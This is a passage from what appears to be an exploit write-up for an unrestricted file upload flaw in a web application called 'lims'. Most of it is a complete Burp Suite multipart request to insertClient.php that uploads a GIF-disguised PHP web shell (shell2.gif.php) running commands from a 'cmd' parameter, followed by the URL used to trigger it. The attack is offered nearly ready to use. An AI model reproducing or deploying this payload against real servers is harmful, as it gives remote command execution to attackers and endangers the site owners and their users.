passthru($_GET['cmd']);  
echo"<pre>";  
?>

# Attack Vectors:  
-------------------------

After uploading malicious image can access it to get the shell

http://localhost/lims/uploads/shell2.gif.php?cmd=id

Burp Suit Request  
-----------------------------

POST /lims/insertClient.php HTTP/1.1  
Host: localhost  
Content-Length: 2197  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/lims/addClient.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_id"

1716015032

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_password"

Password

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="name"

Test

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"  
Content-Type: application/x-php

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="sex"

Male

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="birth_date"

1/1/1988

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="maritial_status"

M

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="phone"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="address"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="policy_id"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="agent_id"

Agent007

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_id"

1716015032-275794639

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_name"

Test1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_sex"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_birth_date"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_relationship"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="priority"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_phone"

1  
------WebKitFormBoundary5plGALZGPOOdBlF0

Tag

#git